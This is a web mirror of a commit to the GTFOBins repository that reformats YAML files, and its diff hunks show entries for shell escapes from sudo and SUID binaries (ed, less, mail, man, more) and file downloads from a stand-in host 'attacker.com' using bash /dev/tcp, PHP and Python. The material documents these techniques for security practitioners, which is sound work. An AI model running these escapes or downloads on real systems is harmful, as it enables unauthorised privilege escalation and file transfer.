mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Fix YAMLs format
This commit is contained in:
parent
bdf78c5e99
commit
b96f6e9a49
@ -17,8 +17,8 @@ functions:
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
busybox httpd -f -p $LPORT -h .
|
||||
---
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
- code: |
|
||||
./ed
|
||||
!/bin/sh
|
||||
file-read:
|
||||
|
@ -29,7 +29,7 @@ functions:
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |-
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
|
@ -12,7 +12,7 @@ functions:
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
- code: |
|
||||
./less /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
sudo mail -f /etc/hosts
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
- code: |
|
||||
./mail -f /etc/hosts
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
file-read:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
- code: |
|
||||
TERM= ./more /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
|
@ -20,7 +20,7 @@ functions:
|
||||
^T
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |-
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
|
@ -35,7 +35,7 @@ functions:
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
|
@ -20,7 +20,7 @@ functions:
|
||||
^T
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |-
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
|
@ -18,7 +18,7 @@ functions:
|
||||
python2 -m SimpleHTTPServer $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
|
Loading…
Reference in New Issue
Block a user